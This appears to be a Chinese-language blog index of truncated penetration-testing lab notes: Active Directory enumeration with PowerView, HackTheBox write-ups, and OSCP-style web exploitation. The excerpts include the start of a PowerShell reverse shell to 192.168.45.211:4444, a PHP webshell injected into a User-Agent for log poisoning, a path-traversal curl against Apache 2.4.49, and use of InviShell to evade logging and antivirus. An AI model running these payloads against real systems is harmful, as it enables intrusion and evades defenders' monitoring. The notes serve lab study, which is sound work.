Objective 2
任务枚举以下内容在dollarcorp domain:列出所有OU列出StudentMachines OU所有计算机列出GPO枚举应用在StudentMachines OU的GPO 运行 invishell 脚本以避免增强日志记录 否则导入PowerView.ps1...
Objective 1
任务:枚举以下内容在dollarcorp domain:用户计算机域管理员域企业管理员 1. Powerview方式运行 invishell 脚本以避免增强日志记录 否则导入PowerView.ps1会被av拦截C:\AD\Tools\InviShell\RunW...
Buff chisel端口转发用于windows
实验环境攻击者 Kali 10.10.14.6受害者 IP 10.10.10.198 LinuxEasy 1. 信息收集8080端口开启我们搜索projectworlds.in gym exploit发现一个RCEhttps://www.exploit-db.com/exploits/48506pytho...
SecNotes CSRF
实验环境攻击者 Kali 10.10.14.6受害者 IP 10.10.10.97 1. 信息收集80,445,8808端口打开80端口我们注册一个用户找到一个用户我们尝试修改密码不需要原密码就能修改密码 明显是CSRF漏洞 也就是...
文件上传 使用非可执行文件
我们可能会遇到这样的情况:找到不受限制的文件上传机制,但无法利用它。一个例子是 Google Drive,我们可以在其中上传任何文件,但无法利用它来获取系统访问权限。在这种情况下,我们需要利用...
powershell反弹shell制作
Kali使用pwsh编译$Text = '$client = New-Object System.Net.Sockets.TCPClient('192.168.45.211',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.R...
php包装器:data:\\
虽然 php://filter 包装器可用于包含文件的内容,但我们可以使用 data:// 包装器来实现代码执行。此包装器用于将数据元素作为纯文本或 Base64 编码数据嵌入到正在运行的 Web 应用程序的代码中。...
/var/log/access.log 日志污染
目标IP 192.168.174.16当前有LFI漏洞 /meteor/index.php?page=且可以访问/var/log/access.log现在我们在User-Agent里插入php木马并运行<?php echo system($_GET['cmd']); ?>通过ps命令验...
对curl进行URL编码
目标IP为:192.168.174.16web服务器为Apache httpd 2.4.49https://www.exploit-db.com/exploits/50383现在192.168.174.16在cgi-bin有文件包含漏洞 尝试用curl得到/opt/passwordscurl http://192...